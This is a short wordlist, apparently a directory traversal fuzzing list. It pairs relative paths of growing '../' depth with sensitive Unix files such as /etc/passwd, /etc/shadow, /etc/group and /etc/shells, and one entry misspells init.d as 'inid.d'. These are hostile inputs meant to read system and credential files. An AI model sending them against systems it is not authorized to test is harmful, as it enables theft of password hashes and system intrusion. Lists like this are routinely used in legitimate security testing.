usr/bin/vi
../usr/bin/vi
../../usr/bin/vi
../../../usr/bin/vi
../../../../usr/bin/vi
../../../../../usr/bin/vi
etc/rc.d/inid.d
../etc/rc.d/inid.d
../../etc/rc.d/inid.d
../../../etc/rc.d/inid.d
../../../../etc/rc.d/inid.d
../../../../../etc/rc.d/inid.d
etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
etc/group
../etc/group
../../etc/group
../../../etc/group
../../../../etc/group
../../../../../etc/group
etc/init
../etc/init
../../etc/init
../../../etc/init
../../../../etc/init
../../../../../etc/init
etc/shadow
../etc/shadow
../../etc/shadow
../../../etc/shadow
../../../../etc/shadow
../../../../../etc/shadow
etc/shells
../etc/shells
../../etc/shells
../../../etc/shells
../../../../etc/shells
../../../../../etc/shells